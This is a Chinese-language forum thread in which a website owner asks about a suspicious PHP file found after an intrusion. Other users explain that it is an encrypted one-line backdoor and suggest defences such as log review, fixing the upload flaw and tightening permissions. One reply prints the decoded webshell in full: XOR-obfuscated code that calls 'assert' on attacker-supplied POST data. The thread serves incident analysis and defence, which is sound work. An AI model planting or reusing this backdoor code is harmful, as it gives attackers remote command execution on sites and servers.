网站被入侵求解这代码的作用是什么,谢谢!
网站被入侵,目录里面多一个123654.php的文件文件内容如图
有人说这是加密了的,看不出来什么内容
我想问。这种代码一般获取网站数据库信息呢?还是获取管理员信息。
好像管理员信息就在数据库里面!!
这是个一句话后门,不仅可以读取数据库信息,还能对网站文件进行修改操作,权限设置不严格还能执行任意命令
如果服务器有提权漏洞,还能提权服务器,接管你的服务器权限
如果要防护的话还要翻查日志,查找被入侵的记录,看看是哪里存在漏洞被入侵,修复漏洞,删除木马文件,如果自己处理不来的话可以私信我帮忙 本帖最后由 solly 于 2024-1-1 11:27 编辑
为啥发图片,别人用肉眼来执行代码呀?
这个是 assert 一句话木马,id是编码标志,id有值是base64编码,没有值明文,config就是要执行的命令内容:
<?php
class FNYW(){
function zRkh() {
$BiJO = "\x2d"^"\x4c";
$QXpU = "\x67"^"\x14";
$WuBD = "\xc0"^"\xb3";
$irHJ = "\xdb"^"\xbe";
$yiPf = "\xa7"^"\xd5";
$VPfZ = "\xb0"^"\xc4";
$SJkl =$BiJO.$QXpU.$WuBD.$irHJ.$yiPf.$VPfZ;
return $SJkl; /// "assert"
}
function __destruct() {
$ztYM=$this->zRkh();
@$ztYM($this->RI);
}
}
$fnyw = new FNYW();
@$fnyw->RI = isset($_GET['id'])?base64_decode($_POST['config']):$_POST['config'];
?> 怎么都没有人回复呢?大佬们,这种问题怎么防护? 你得找到网站的漏洞是什么才行, 一句话后门 base64加密 进制转换。这个属于WEBSHELL变形,一定是网站哪里有漏洞,还是用安全工具再扫下。 这个是一句话木马,整个php是个后门文件,对方可以通过后门直接操作你的系统,执行命令,具体有没有读取数据库还是做了其他操作,得去看日志文件了。这里面是不会写的,它只是个后门 mmji 发表于 2023-12-31 21:27
这是个一句话后门,不仅可以读取数据库信息,还能对网站文件进行修改操作,权限设置不严格还能执行任意命令 ...
我已经重装系统,他把文件放到upload文件夹下,是不是上传文件源码有漏洞,没有检测文件类型。
查不到记录了,我都重装了。
估计重装也解决不了问题,因为漏洞在哪里没有查。
我目前是把服务器整个文件目录设置了只读,不给写权限。
1、php.ini我关闭了文件上传功能。这样有点用吗?
2、文件目录我设置了555权限。 本帖最后由 lpxx 于 2024-1-1 01:31 编辑
加密后的一句话后门,要么源码,要么服务器有问题,删了没用的。